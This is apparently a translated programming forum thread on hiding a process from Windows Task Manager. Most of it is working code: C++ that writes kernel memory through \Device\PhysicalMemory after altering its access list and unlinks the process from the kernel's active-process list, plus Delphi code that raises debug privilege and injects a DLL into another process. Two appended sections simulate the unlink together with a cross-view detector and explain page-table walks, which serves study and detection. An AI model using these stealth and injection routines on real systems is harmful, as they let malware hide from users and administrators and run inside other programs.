How can an application hide itself from Task Manager on Windows 2000?

It can't be done on Win2000, unless you hook Win2000's Int 2Eh system service from a driver; that still works.

Delphi can't do this kind of thing; you need VC with the DDK.

Application.Title := '' keeps it off the Applications tab, but the process is still visible.

To hide itself:

#include <windows.h>
#include <accctrl.h>
#include <aclapi.h>

typedef LONG NTSTATUS;
#define NT_SUCCESS(Status)   ((NTSTATUS)(Status) >= 0)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

// RegisterServiceProcess flags (Win9x only)
#define RSP_SIMPLE_SERVICE     0x00000001
#define RSP_UNREGISTER_SERVICE 0x00000000

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString);

class TMyHideProcess
{
private:
    int OSversion;
    RTLINITUNICODESTRING RtlInitUnicodeString;
    ZWOPENSECTION ZwOpenSection;
    HMODULE g_hNtDLL;
    PVOID   g_pMapPhysicalMemory;   // view of the page directory (physical 0x30000)
    HANDLE  g_hMPM;                 // handle to the \Device\PhysicalMemory section

    BOOL   InitNTDLL();
    VOID   CloseNTDLL();
    VOID   SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
    HANDLE OpenPhysicalMemory();
    PVOID  LinearToPhys(PULONG BaseAddress, PVOID addr);
    ULONG  GetData(PVOID addr);
    BOOL   SetData(PVOID addr, ULONG data);
    BOOL   HideProcess2000();
    void   HideProcess98();
public:
    TMyHideProcess(int theosver);
    ~TMyHideProcess();
    void DoHideMe();
};

TMyHideProcess::TMyHideProcess(int theosver)
{
    OSversion = theosver;
    InitNTDLL();
}

TMyHideProcess::~TMyHideProcess()
{
    CloseNTDLL();
}

// Resolve the two undocumented ntdll exports we need.
BOOL TMyHideProcess::InitNTDLL()
{
    g_hNtDLL = NULL;
    g_pMapPhysicalMemory = NULL;
    g_hMPM = NULL;
    g_hNtDLL = LoadLibrary(TEXT("ntdll.dll"));
    if (!g_hNtDLL)
        return FALSE;
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
    if (!RtlInitUnicodeString || !ZwOpenSection)
    {
        CloseNTDLL();
        return FALSE;
    }
    return TRUE;
}

VOID TMyHideProcess::CloseNTDLL()
{
    if (g_hNtDLL != NULL)
    {
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
    }
}

// \Device\PhysicalMemory is normally writable only by SYSTEM. Given WRITE_DAC on the
// section (administrators have it), add SECTION_MAP_WRITE for the calling user.
VOID TMyHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    DWORD dwRes;
    EXPLICIT_ACCESS ea;

    dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, &pDacl, NULL, &pSD);
    if (dwRes != ERROR_SUCCESS)
        goto CleanUp;

    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = (LPTSTR)TEXT("CURRENT_USER");   // special trustee name: the calling user

    dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (dwRes != ERROR_SUCCESS)
        goto CleanUp;

    SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                    NULL, NULL, pNewDacl, NULL);

CleanUp:
    if (pSD)
        LocalFree(pSD);
    if (pNewDacl)
        LocalFree(pNewDacl);
}

// Open \Device\PhysicalMemory read/write and map the page directory (physical 0x30000 on
// Win2000 x86 without PAE) so LinearToPhys can walk it.
HANDLE TMyHideProcess::OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;

    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    if (status == STATUS_ACCESS_DENIED)
    {
        // No write access yet: reopen with WRITE_DAC, grant ourselves SECTION_MAP_WRITE, retry.
        status = ZwOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
        if (NT_SUCCESS(status))
        {
            SetPhyscialMemorySectionCanBeWrited(g_hMPM);
            CloseHandle(g_hMPM);
            status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
        }
    }
    if (!NT_SUCCESS(status))
        return NULL;

    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, 0x30000, 0x1000);
    if (g_pMapPhysicalMemory == NULL)
        return NULL;
    return g_hMPM;
}

// Walk the x86 (non-PAE) page directory / page table for a linear address.
// BaseAddress is the mapped page directory; a PDE with bit 7 (PS) set maps a 4 MB page.
PVOID TMyHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr;
    PGDE = BaseAddress[VAddr >> 22];
    if ((PGDE & 1) == 0)                     // PDE not present
        return 0;
    if (PGDE & 0x00000080)                   // 4 MB page: PDE holds bits 31..22
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        PULONG pPageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xFFFFF000, 0x1000);
        if (pPageTable == NULL)
            return 0;
        PTE = pPageTable[(VAddr & 0x003FF000) >> 12];
        UnmapViewOfFile(pPageTable);
        if ((PTE & 1) == 0)                  // PTE not present
            return 0;
        PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
    }
    return (PVOID)PAddr;
}

// Read one dword at a kernel virtual address by going through physical memory.
ULONG TMyHideProcess::GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (phys == 0)
        return 0;
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, phys & 0xFFFFF000, 0x1000);
    if (tmp == NULL)
        return 0;
    ULONG ret = tmp[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(tmp);
    return ret;
}

// Write one dword at a kernel virtual address the same way.
BOOL TMyHideProcess::SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (phys == 0)
        return FALSE;
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
    if (tmp == NULL)
        return FALSE;
    tmp[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(tmp);
    return TRUE;
}

// Win2000 x86: find our own EPROCESS through the KPCR and unlink it from
// ActiveProcessLinks. The offsets are Win2000-specific:
//   0xFFDFF124      = KPCR.PrcbData.CurrentThread
//   ETHREAD + 0x22c = ThreadsProcess
//   EPROCESS + 0xa0 / 0xa4 = ActiveProcessLinks.Flink / Blink
BOOL TMyHideProcess::HideProcess2000()
{
    BOOL ok = FALSE;
    if (g_hNtDLL == NULL && !InitNTDLL())
        return FALSE;
    if (OpenPhysicalMemory() == NULL)
        return FALSE;

    ULONG thread  = GetData((PVOID)0xFFDFF124);
    ULONG process = GetData((PVOID)(thread + 0x22c));
    ULONG fw = GetData((PVOID)(process + 0xa0));   // Flink: next process's list entry
    ULONG bw = GetData((PVOID)(process + 0xa4));   // Blink: previous process's list entry
    if (thread && process && fw && bw)
    {
        SetData((PVOID)(fw + 4), bw);   // next->Blink = prev
        SetData((PVOID)bw, fw);         // prev->Flink = next
        ok = TRUE;
    }

    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();
    return ok;
}

// Win9x: RegisterServiceProcess marks the process as a service, which keeps it
// out of the Ctrl+Alt+Del task list.
void TMyHideProcess::HideProcess98()
{
    typedef BOOL (WINAPI *pRegisterService)(DWORD, DWORD);
    HMODULE hKernel = LoadLibrary(TEXT("kernel32.dll"));
    if (hKernel)
    {
        pRegisterService RegisterService = (pRegisterService)GetProcAddress(hKernel, "RegisterServiceProcess");
        if (RegisterService)
            RegisterService(::GetCurrentProcessId(), RSP_SIMPLE_SERVICE);
        FreeLibrary(hKernel);
        hKernel = NULL;
    }
}

void TMyHideProcess::DoHideMe()
{
    switch (OSversion)
    {
    case 98:
        HideProcess98();
        break;
    case 2000:
        HideProcess2000();
        break;
    }
}

Actually Delphi can do it, but it takes some fairly complex techniques. Have a look at the book 《Delphi深入windows核心编程》; I don't really understand it myself. The principle is to make the program's process parasitize another process.

// Requires: Windows, SysUtils, TlHelp32

// AFilename: name of the executable whose process ID is wanted (a path may be included)
// PathMatch: whether the path must match as well
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean;
  var ProcessID: DWORD);
var
  lppe: TProcessEntry32;
  SsHandle: THandle;
  FoundAProc, FoundOK: Boolean;
begin
  ProcessID := 0;
  lppe.dwSize := SizeOf(lppe);   // Process32First fails unless dwSize is set
  SsHandle := CreateToolHelp32SnapShot(TH32CS_SNAPALL, 0);
  FoundAProc := Process32First(SsHandle, lppe);
  while FoundAProc do
  begin
    if PathMatch then
      FoundOK := AnsiStrIComp(lppe.szExeFile, PChar(AFilename)) = 0
    else
      FoundOK := AnsiStrIComp(PChar(ExtractFileName(lppe.szExeFile)),
                              PChar(ExtractFileName(AFilename))) = 0;
    if FoundOK then
    begin
      ProcessID := lppe.th32ProcessID;
      Break;
    end;
    FoundAProc := Process32Next(SsHandle, lppe);
  end;
  // if not FoundAProc then ShowMessage(SysErrorMessage(GetLastError));
  CloseHandle(SsHandle);
end;

// Enable or disable the given privilege (SeDebugPrivilege) on our own token
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;
    a := 0;
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

// Inject a DLL into the given process
// HostFile: the host executable to attach to (Exe); GuestFile: the DLL to embed in it
// e.g. AttachToProcess('Notepad.exe', 'D:\TESTDLL.DLL');
function AttachToProcess(const HostFile, GuestFile: string;
  const PID: DWORD = 0): DWORD;
var
  hRemoteProcess: THandle;
  dwRemoteProcessId: DWORD;
  cb: DWORD;
  pszLibFileRemote: Pointer;
  iReturnCode: Boolean;
  TempVar: DWORD;
  pfnStartAddr: TFNThreadStartRoutine;
  pszLibAFilename: PWideChar;
begin
  Result := 0;
  EnabledDebugPrivilege(True);
  GetMem(pszLibAFilename, (Length(GuestFile) + 1) * SizeOf(WideChar));
  StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) + 1);
  if PID > 0 then
    dwRemoteProcessId := PID
  else
    FindAProcess(HostFile, False, dwRemoteProcessId);
  // We will write into the remote process's address space and create a remote thread,
  // so we need enough access (PROCESS_CREATE_THREAD, VM_OPERATION, VM_WRITE).
  // Then we can start a thread at LoadLibraryW to load our DLL. LoadLibraryW lives in
  // kernel32.dll and takes a single parameter, the absolute path of the DLL
  // (pszLibAFilename). Because the DLL is loaded inside the remote process, the path
  // must first be copied into the remote address space (otherwise the remote thread
  // cannot read the parameter).
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD or  // allow creating a remote thread
                                PROCESS_VM_OPERATION or   // allow remote VM operations
                                PROCESS_VM_WRITE,         // allow remote VM writes
                                False, dwRemoteProcessId);
  if hRemoteProcess = 0 then
  begin
    FreeMem(pszLibAFilename);
    Exit;
  end;
  // Memory needed for the DLL path
  cb := (1 + lstrlenW(pszLibAFilename)) * SizeOf(WideChar);
  // Allocate the DLL filename buffer in the remote process with VirtualAllocEx
  pszLibFileRemote := VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE);
  // Copy the DLL path into the remote process with WriteProcessMemory
  TempVar := 0;
  iReturnCode := (pszLibFileRemote <> nil) and
    WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
  if iReturnCode then
  begin
    // Entry address of LoadLibraryW
    pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
    // Everything is ready: create the remote thread at pfnStartAddr (the entry of
    // LoadLibraryW) with pszLibFileRemote (the copied full DLL path) as its parameter,
    // which loads our DLL inside the remote process.
    TempVar := 0;
    Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr,
                                 pszLibFileRemote, 0, TempVar);
  end;
  CloseHandle(hRemoteProcess);
  FreeMem(pszLibAFilename);
end;

Bookmarked. Finally found a Delphi version; testing it first!

Could you send me a Delphi version too? I urgently need one, thanks! [email protected]

After a week of research I finally achieved hiding in the true sense, but it is platform-dependent: the XP implementation and the 2000 and 2003 implementations are all different, because the structure of the EProcess object differs. Also, because of how NT works, the program has no effect when run on VMWare; I have no idea what the problem is. On VMWare the addresses are $Fxxxxxxx, while on a real system they are $8xxxxxxx, so subtracting $80000000 gives the physical address :) Use ZwQueryInformation to reach the kernel object EProcess that the process handle points to (this requires access to physical memory), then remove the FLink (EProcess+$88) and BLink (EProcess+$8C) from the ActiveProcessLink doubly linked list; the process then "goes missing" from the system. It cannot be obtained through PsAPI or similar API methods; only the innermost kernel mode of the OS can still know about it (I haven't figured out that method yet :). But even Ring0 software such as SoftICE can't detect it, which is already pretty impressive. Windows XP demo: http://ly.activepower.net/projects/index.htm

Microsoft is protecting against hooks more and more strictly, so how does QQ's hook manage to get into every program?
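The unlink performed by the HideProcess2000 code and described in the last long reply (removing FLink/BLink from ActiveProcessLinks) leaves the EPROCESS itself intact; only its list neighbours stop pointing at it, which is also why "the innermost kernel" can still find it. The following is an added example, not code from this thread: it models that unlink on an in-memory list and shows the cross-view check a detector can run, comparing the process-list walk with the processes reachable from the thread table (the same ETHREAD->ThreadsProcess pointer the posted code uses to find its own EPROCESS). The structure and field names mimic NT, but the layouts, PIDs and thread table are constructed for the simulation and are not the Win2000/XP offsets quoted above.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-ins for the NT structures; the layouts are not the real ones. */
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;

typedef struct _EPROCESS {
    unsigned long UniqueProcessId;
    LIST_ENTRY    ActiveProcessLinks;   /* the chain hanging off PsActiveProcessHead */
} EPROCESS;

typedef struct _ETHREAD {
    unsigned long ThreadId;
    EPROCESS     *ThreadsProcess;       /* owning process; the posted code reads it at ETHREAD+0x22c */
} ETHREAD;

#define CONTAINING_RECORD(addr, type, field) ((type *)((char *)(addr) - offsetof(type, field)))

static void InitializeListHead(LIST_ENTRY *h) { h->Flink = h->Blink = h; }

static void InsertTailList(LIST_ENTRY *h, LIST_ENTRY *e)
{
    e->Flink = h; e->Blink = h->Blink;
    h->Blink->Flink = e; h->Blink = e;
}

/* The two writes HideProcess2000 performs through \Device\PhysicalMemory:
 *   SetData(fw + 4, bw)  ->  next->Blink = prev
 *   SetData(bw,     fw)  ->  prev->Flink = next
 * The EPROCESS itself is untouched and its threads keep being scheduled. */
void dkom_unlink(EPROCESS *p)
{
    LIST_ENTRY *fw = p->ActiveProcessLinks.Flink;
    LIST_ENTRY *bw = p->ActiveProcessLinks.Blink;
    fw->Blink = bw;
    bw->Flink = fw;
}

/* View 1: walk the active-process list, which EnumProcesses/Task Manager rely on. */
int list_walk_contains(LIST_ENTRY *head, unsigned long pid)
{
    LIST_ENTRY *e;
    for (e = head->Flink; e != head; e = e->Flink)
        if (CONTAINING_RECORD(e, EPROCESS, ActiveProcessLinks)->UniqueProcessId == pid)
            return 1;
    return 0;
}

/* View 2: every thread still points at its EPROCESS. A process reachable from a thread
 * but absent from the list walk has been unlinked. Returns how many were found. */
int cross_view_detect(LIST_ENTRY *head, const ETHREAD *threads, size_t nthreads,
                      unsigned long *hidden, size_t max_hidden)
{
    size_t i, j, found = 0;
    for (i = 0; i < nthreads; i++) {
        unsigned long pid = threads[i].ThreadsProcess->UniqueProcessId;
        int dup = 0;
        for (j = 0; j < found; j++)
            if (hidden[j] == pid) dup = 1;
        if (!dup && found < max_hidden && !list_walk_contains(head, pid))
            hidden[found++] = pid;
    }
    return (int)found;
}

/* Constructed system of three processes and four threads. Hides PID 1234 as the thread
 * describes, reports whether the list walk still sees it, and returns the PID flagged by
 * the cross-view check (0 if nothing is flagged). */
unsigned long demo_hide_and_detect(int *list_still_sees_it)
{
    static EPROCESS procs[3];
    static ETHREAD threads[4];
    static LIST_ENTRY PsActiveProcessHead;
    const unsigned long pids[3] = { 4, 1234, 2048 };
    unsigned long hidden[3];
    int i, n;

    InitializeListHead(&PsActiveProcessHead);
    for (i = 0; i < 3; i++) {
        procs[i].UniqueProcessId = pids[i];
        InsertTailList(&PsActiveProcessHead, &procs[i].ActiveProcessLinks);
    }
    threads[0].ThreadId = 8;    threads[0].ThreadsProcess = &procs[0];
    threads[1].ThreadId = 12;   threads[1].ThreadsProcess = &procs[0];
    threads[2].ThreadId = 1236; threads[2].ThreadsProcess = &procs[1];   /* the one we hide */
    threads[3].ThreadId = 2052; threads[3].ThreadsProcess = &procs[2];

    dkom_unlink(&procs[1]);

    *list_still_sees_it = list_walk_contains(&PsActiveProcessHead, 1234);
    n = cross_view_detect(&PsActiveProcessHead, threads, 4, hidden, 3);
    return n == 1 ? hidden[0] : 0;
}

int main(void)
{
    int seen = 0;
    unsigned long pid = demo_hide_and_detect(&seen);
    printf("list walk sees PID 1234 after unlink: %s\n", seen ? "yes" : "no");
    printf("cross-view check flags PID: %lu\n", pid);
    return 0;
}
```

The detection side is the point: anything that enumerates by following ActiveProcessLinks (PsAPI, Task Manager, tools built on them) sees two processes, while the thread table still leads back to the third. Real cross-view tools compare several such sources (thread lists, handle tables, the PID table, scheduler queues) because an attacker who unlinks from only one list leaves the others inconsistent.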
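The LinearToPhys routine in the posted C++ code walks the x86 page directory it mapped from physical address 0x30000, and GetData/SetData then touch the resulting physical page. As an added example that is not from the thread, the same two-level, non-PAE walk is run here over a constructed 8 MiB "physical memory" so it can be executed on any machine. It covers the two cases the original handles, a 4 KB page through a page table and a 4 MB large page (PDE bit 7), plus the not-present case where the original would dereference an unchecked MapViewOfFile result. The large-page entry that maps 0x80000000 onto physical 0 is consistent with the later reply's observation that on a real system "address minus $80000000" is the physical address. All table contents, addresses and sample values are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PHYS_SIZE  (8u << 20)    /* 8 MiB of constructed "physical memory" */
#define PDE_BASE   0x30000u      /* page-directory frame the posted code maps */
#define PT_BASE    0x31000u      /* one page table we construct */
#define PG_PRESENT 0x1u
#define PG_PS      0x80u         /* PDE bit 7: 4 MB page */
#define PA_FAULT   0xFFFFFFFFu

static uint8_t *phys;            /* simulated RAM, indexed by physical address */

static uint32_t rd32(uint32_t pa) { uint32_t v; memcpy(&v, phys + pa, 4); return v; }
static void     wr32(uint32_t pa, uint32_t v) { memcpy(phys + pa, &v, 4); }

/* Two-level x86 walk (non-PAE), the same steps as the posted LinearToPhys:
 * PDE = PD[va >> 22]; if present with PS set, the PDE supplies bits 31..22;
 * otherwise PTE = PT[(va >> 12) & 0x3FF]. Returns PA_FAULT instead of dereferencing
 * a not-present entry or a table that lies outside physical memory. */
uint32_t linear_to_phys(uint32_t pd_base, uint32_t va)
{
    uint32_t pde, pt, pte;
    if (pd_base + 0x1000 > PHYS_SIZE) return PA_FAULT;
    pde = rd32(pd_base + (va >> 22) * 4);
    if (!(pde & PG_PRESENT)) return PA_FAULT;
    if (pde & PG_PS)
        return (pde & 0xFFC00000u) | (va & 0x003FFFFFu);
    pt = pde & 0xFFFFF000u;
    if (pt + 0x1000 > PHYS_SIZE) return PA_FAULT;
    pte = rd32(pt + ((va >> 12) & 0x3FFu) * 4);
    if (!(pte & PG_PRESENT)) return PA_FAULT;
    return (pte & 0xFFFFF000u) | (va & 0xFFFu);
}

/* Constructed tables: a 4 KB mapping through a page table, a 4 MB mapping of
 * 0x80000000 onto physical 0, and one PDE left not present. */
static void build_tables(void)
{
    phys = calloc(PHYS_SIZE, 1);
    if (!phys) exit(1);
    wr32(PDE_BASE + 0x201u * 4, PT_BASE | PG_PRESENT);             /* VA 0x80400000.. -> page table */
    wr32(PT_BASE + 0x3u * 4, 0x7C000u | PG_PRESENT);               /* VA 0x80403000 -> frame 0x7C000 */
    wr32(PDE_BASE + 0x200u * 4, 0x00000000u | PG_PRESENT | PG_PS); /* VA 0x80000000 -> phys 0, 4 MB */
    /* PDE 0x202 (VA 0x80800000) deliberately left not present. */
    wr32(0x7C124u, 0xDEADBEEFu);     /* sample data behind the 4 KB mapping */
    wr32(0x123458u, 0x11223344u);    /* sample data behind the 4 MB mapping */
}

/* Translate one virtual address (building the tables on first use). */
uint32_t translate(uint32_t va)
{
    if (!phys) build_tables();
    return linear_to_phys(PDE_BASE, va);
}

/* Read a dword at a kernel virtual address the way the posted GetData does:
 * translate, then read the physical location; 0 if the translation faults. */
uint32_t get_data(uint32_t va)
{
    uint32_t pa = translate(va);
    return (pa == PA_FAULT || pa + 4 > PHYS_SIZE) ? 0 : rd32(pa);
}

int main(void)
{
    printf("0x80403124 -> 0x%08X (4 KB page)\n", translate(0x80403124u));
    printf("0x80123458 -> 0x%08X (4 MB page)\n", translate(0x80123458u));
    printf("0x80800000 -> 0x%08X (not present)\n", translate(0x80800000u));
    printf("[0x80403124] = 0x%08X\n", get_data(0x80403124u));
    return 0;
}
```

Two details carry over to the real thing: the page-directory base is a physical address the code must already know (0x30000 is hard-coded for Win2000 x86 without PAE; PAE and later releases use a different layout), and every translation must check the present bit, because a kernel address that happens to be paged out or unmapped otherwise becomes a read or write to an unrelated physical page.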